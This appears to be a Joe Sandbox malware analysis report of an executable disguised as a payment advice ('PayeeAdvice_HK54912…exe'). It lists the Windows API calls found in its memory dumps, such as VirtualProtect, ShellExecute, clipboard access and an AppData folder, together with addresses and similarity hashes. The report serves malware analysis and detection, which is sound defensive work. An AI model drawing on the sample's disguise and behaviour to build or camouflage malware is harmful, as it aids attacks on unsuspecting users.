                                                                                                                                          • Instruction Fuzzy Hash: 8EE08632104259ABDF109E548C04EEB775CFB04350F044432F911E3140D231E820DBA4
                                                                                                                                          APIs
                                                                                                                                          • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027AB
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2690936672.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2690910719.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2690980563.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2691009289.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 544645111-0
                                                                                                                                          • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                                                          • Instruction ID: 267fa8ad402a2f1685f06aa6efb9df116a04c7e31b4918ac066fddfc95f4d9be
                                                                                                                                          • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                                                          • Instruction Fuzzy Hash: 5EF092F15097A0DEF350DF688C847063BE0E7483C4B03852AE368F6268EB344044CF19
                                                                                                                                          APIs
                                                                                                                                          • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022C6
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: PrivateProfileString
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1096422788-0
                                                                                                                                          • Opcode ID: 72cdf40c1bf6f5db5f4d9709fda42ed23ef015487cba6367b71ebc3a35df21ba
                                                                                                                                          • Instruction ID: 80fa8228d7b44b53eec3e7c38ed93a9451a1703e345daa2b135a9f68ba926bbf
                                                                                                                                          • Opcode Fuzzy Hash: 72cdf40c1bf6f5db5f4d9709fda42ed23ef015487cba6367b71ebc3a35df21ba
                                                                                                                                          • Instruction Fuzzy Hash: 38E04F30800204BADB00AFA0CD49EAE3B78BF11344F20843AF581BB0D1E6B895809759
                                                                                                                                          APIs
                                                                                                                                          • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AttributesFile
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                          • Opcode ID: c271530863e58661098a5c30559a627ee948be805f1aaa302f87f5e4c73ddd49
                                                                                                                                          • Instruction ID: f4c604eae2506afdbcc8ec41f9b2bc8be0b1ceb91ea8510f154d928e9cd5b687
                                                                                                                                          • Opcode Fuzzy Hash: c271530863e58661098a5c30559a627ee948be805f1aaa302f87f5e4c73ddd49
                                                                                                                                          • Instruction Fuzzy Hash: A4D012B2B08100D7DB10DFE59A08ADDB7699B10329F304A77D101F21D0D2B885419A2A
                                                                                                                                          APIs
                                                                                                                                          • SendMessageW.USER32(00000028,?,00000001,00403F90), ref: 00404172
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: MessageSend
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                          • Opcode ID: 7da09c7c9c972ac789da334295fdd31a978bd1861dc1653affe8cad2486e61eb
                                                                                                                                          • Instruction ID: f15b28e5f211e7e8d1db6812d8cffd834990aabd0fd5fa3204c122ebb67abe5b
                                                                                                                                          • Opcode Fuzzy Hash: 7da09c7c9c972ac789da334295fdd31a978bd1861dc1653affe8cad2486e61eb
                                                                                                                                          • Instruction Fuzzy Hash: 2BB01235684202BBEE314B00ED0DF957E62F76C701F008474B340240F0CAB344B2DB09
                                                                                                                                          APIs
                                                                                                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: FilePointer
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 973152223-0
                                                                                                                                          • Opcode ID: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                                                                                                          • Instruction ID: 9708a756cc2c9ae94551e8e9c592081b607f980c3267f7876f2ac268d6c84cd7
                                                                                                                                          • Opcode Fuzzy Hash: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                                                                                                          • Instruction Fuzzy Hash: B8B01231584200BFDA214F00DE05F057B21A790700F10C030B304381F082712420EB5D
                                                                                                                                          APIs
                                                                                                                                          • Sleep.KERNELBASE(00000000), ref: 004014E6
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Sleep
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3472027048-0
                                                                                                                                          • Opcode ID: 35c76f566c1ebd9d6b02c32a207bcdc7b8f69ffae950b4dd1e6fa8c4e5a5d930
                                                                                                                                          • Instruction ID: ad5cbb4e8c7f0aba0b65fecb58585b4f8dfec95c15ef4476e698ddf4bc3863dd
                                                                                                                                          • Opcode Fuzzy Hash: 35c76f566c1ebd9d6b02c32a207bcdc7b8f69ffae950b4dd1e6fa8c4e5a5d930
                                                                                                                                          • Instruction Fuzzy Hash: 05D0C77771414097D750DBB86E8585B73ACD7513197204C73D542F1491D178D8018939
                                                                                                                                          APIs
                                                                                                                                          • GlobalAlloc.KERNELBASE(00000040,?,10001259,?,?,10001534,?,10001020,10001019,00000001), ref: 10001225
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2690936672.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2690910719.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2690980563.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2691009289.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AllocGlobal
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3761449716-0
                                                                                                                                          • Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                                                                                                          • Instruction ID: 8a0ecea123cfc10dc9c303f5c75fb6a011d4279a03f0c54a853e6fb6a4ccb70c
                                                                                                                                          • Opcode Fuzzy Hash: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                                                                                                          • Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638
                                                                                                                                          APIs
                                                                                                                                          • GetDlgItem.USER32(?,00000403), ref: 00405332
                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00405341
                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0040537E
                                                                                                                                          • GetSystemMetrics.USER32(00000015), ref: 00405386
                                                                                                                                          • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004053A7
                                                                                                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053B8
                                                                                                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053CB
                                                                                                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053D9
                                                                                                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 004053EC
                                                                                                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040540E
                                                                                                                                          • ShowWindow.USER32(?,00000008), ref: 00405422
                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 00405443
                                                                                                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405453
                                                                                                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040546C
                                                                                                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405478
                                                                                                                                          • GetDlgItem.USER32(?,000003F8), ref: 00405350
                                                                                                                                            • Part of subcall function 00404164: SendMessageW.USER32(00000028,?,00000001,00403F90), ref: 00404172
                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 00405495
                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_00005267,00000000), ref: 004054A3
                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 004054AA
                                                                                                                                          • ShowWindow.USER32(00000000), ref: 004054CE
                                                                                                                                          • ShowWindow.USER32(?,00000008), ref: 004054D3
                                                                                                                                          • ShowWindow.USER32(00000008), ref: 0040551D
                                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405551
                                                                                                                                          • CreatePopupMenu.USER32 ref: 00405562
                                                                                                                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405576
                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00405596
                                                                                                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055AF
                                                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 004055E7
                                                                                                                                          • OpenClipboard.USER32(00000000), ref: 004055F7
                                                                                                                                          • EmptyClipboard.USER32 ref: 004055FD
                                                                                                                                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405609
                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00405613
                                                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405627
                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00405647
                                                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00405652
                                                                                                                                          • CloseClipboard.USER32 ref: 00405658
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                          • String ID: {
                                                                                                                                          • API String ID: 590372296-366298937
                                                                                                                                          • Opcode ID: 0c7871d9c118b0e9bc82f4af322ee916726f515fd3ec4b55100c1069ec2247ae
                                                                                                                                          • Instruction ID: 9fa9afbe460ba73b362fbd7a7e80f39848d7c2b38d0fa32ac3ffaaa5a75fb061
                                                                                                                                          • Opcode Fuzzy Hash: 0c7871d9c118b0e9bc82f4af322ee916726f515fd3ec4b55100c1069ec2247ae
                                                                                                                                          • Instruction Fuzzy Hash: 4AB16B70900209BFDF219F60DD89AAE7B79FB04315F50803AFA05BA1A0C7759E52DF69
                                                                                                                                          APIs
                                                                                                                                          • GetDlgItem.USER32(?,000003FB), ref: 00404619
                                                                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 00404643
                                                                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 004046F4
                                                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 004046FF
                                                                                                                                          • lstrcmpiW.KERNEL32(Call,004226D0,00000000,?,?), ref: 00404731
                                                                                                                                          • lstrcatW.KERNEL32(?,Call), ref: 0040473D
                                                                                                                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 0040474F
                                                                                                                                            • Part of subcall function 004056AA: GetDlgItemTextW.USER32(?,?,00000400,00404786), ref: 004056BD
                                                                                                                                            • Part of subcall function 0040617E: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,75923420,00403512), ref: 004061E1
                                                                                                                                            • Part of subcall function 0040617E: CharNextW.USER32(?,?,?,00000000), ref: 004061F0
                                                                                                                                            • Part of subcall function 0040617E: CharNextW.USER32(?,"C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,75923420,00403512), ref: 004061F5
                                                                                                                                            • Part of subcall function 0040617E: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,75923420,00403512), ref: 00406208
                                                                                                                                          • GetDiskFreeSpaceW.KERNEL32(004206A0,?,?,0000040F,?,004206A0,004206A0,?,00000000,004206A0,?,?,000003FB,?), ref: 00404810
                                                                                                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040482B
                                                                                                                                          • SetDlgItemTextW.USER32(00000000,00000400,00420690), ref: 004048B1
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                                                                                                          • String ID: A$C:\Users\user\AppData\Local\foreslaaende$Call
                                                                                                                                          • API String ID: 2246997448-3579533417
                                                                                                                                          • Opcode ID: 5e1be59e26550fe03483dde9140ef9c7df16d0723f1807c21cae017824fc49c2
                                                                                                                                          • Instruction ID: fc6e5784adbf23f3bf0ca4204261aafad130db7b69f5cfc08d06a9dfd3cb4e02
                                                                                                                                          • Opcode Fuzzy Hash: 5e1be59e26550fe03483dde9140ef9c7df16d0723f1807c21cae017824fc49c2
                                                                                                                                          • Instruction Fuzzy Hash: 1B916FB2900209ABDB11AFA1CC85AAF77B8EF85354F10847BF701B72D1D77C99418B69
                                                                                                                                          APIs
                                                                                                                                          • CoCreateInstance.OLE32(00407474,?,00000001,00407464,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020BD
                                                                                                                                          Strings
                                                                                                                                          • C:\Users\user\AppData\Local\foreslaaende, xrefs: 004020FB
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CreateInstance
                                                                                                                                          • String ID: C:\Users\user\AppData\Local\foreslaaende
                                                                                                                                          • API String ID: 542301482-1954961325
                                                                                                                                          • Opcode ID: a0bb92f52aa57a686fb7670324366c30062890f5d7bc8498ec9199db5fdfdb62
                                                                                                                                          • Instruction ID: b9114a0b4d3c9f05545c6126c0c632b8b73b1fcf7d0bd01aa9b6132af3d7cd36
                                                                                                                                          • Opcode Fuzzy Hash: a0bb92f52aa57a686fb7670324366c30062890f5d7bc8498ec9199db5fdfdb62
                                                                                                                                          • Instruction Fuzzy Hash: 4B414F75A00105BFCB00DFA4C988EAE7BB5AF49318B20416AF505EF2D1D679AD41CB55
                                                                                                                                          APIs
                                                                                                                                          • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040277F
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: FileFindFirst
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1974802433-0
                                                                                                                                          • Opcode ID: d555c6e09dbf6ad66d53053e92e2a3446f724d402b29968be0a2f1aefd2bf89d
                                                                                                                                          • Instruction ID: c3eebe46d33317c4d9c4db9deeb30b83dd141210d4acf70d00b973005abdca29
                                                                                                                                          • Opcode Fuzzy Hash: d555c6e09dbf6ad66d53053e92e2a3446f724d402b29968be0a2f1aefd2bf89d
                                                                                                                                          • Instruction Fuzzy Hash: 81F05EB1614114DBDB00DBA4DD499AEB378FF14318F20097AE141F31D0D6B45940DB2A
                                                                                                                                          APIs
                                                                                                                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040436A
                                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 0040437E
                                                                                                                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040439B
                                                                                                                                          • GetSysColor.USER32(?), ref: 004043AC
                                                                                                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043BA
                                                                                                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043C8
                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 004043CD
                                                                                                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043DA
                                                                                                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043EF
                                                                                                                                          • GetDlgItem.USER32(?,0000040A), ref: 00404448
                                                                                                                                          • SendMessageW.USER32(00000000), ref: 0040444F
                                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 0040447A
                                                                                                                                          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044BD
                                                                                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 004044CB
                                                                                                                                          • SetCursor.USER32(00000000), ref: 004044CE
                                                                                                                                          • ShellExecuteW.SHELL32(0000070B,open,00427180,00000000,00000000,00000001), ref: 004044E3
                                                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 004044EF
                                                                                                                                          • SetCursor.USER32(00000000), ref: 004044F2
                                                                                                                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404521
                                                                                                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404533
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
